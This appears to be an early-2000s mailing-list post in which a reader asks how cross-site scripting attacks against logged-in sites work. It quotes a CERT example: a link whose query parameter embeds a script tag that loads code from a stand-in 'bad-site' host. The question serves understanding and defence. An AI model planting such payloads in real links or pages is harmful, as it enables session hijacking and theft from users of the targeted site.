There have been quite a few alerts on cross scripting and I'm somewhat confused on the issue. Assuming the offending script is coming from an offending site (not an e-mail with script code appended to victim url) and victim site is a site where sensitive transactions can only be initiated after a valid login, what's going on.
Is it a situation where victim is logged into legit site and while session is open opens another session (through another browser window) with bad guy site and bad guys site has link to legit site appended with offending script ? If there are two separate windows, how does the offending code get passed to victim site ? Below example is from CERT site but I'm not 100 percent sure what they are talking about. <A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A> Mike __________________________________________________ Do You Yahoo!? Send FREE video emails in Yahoo! Mail! http://promo.yahoo.com/videomail/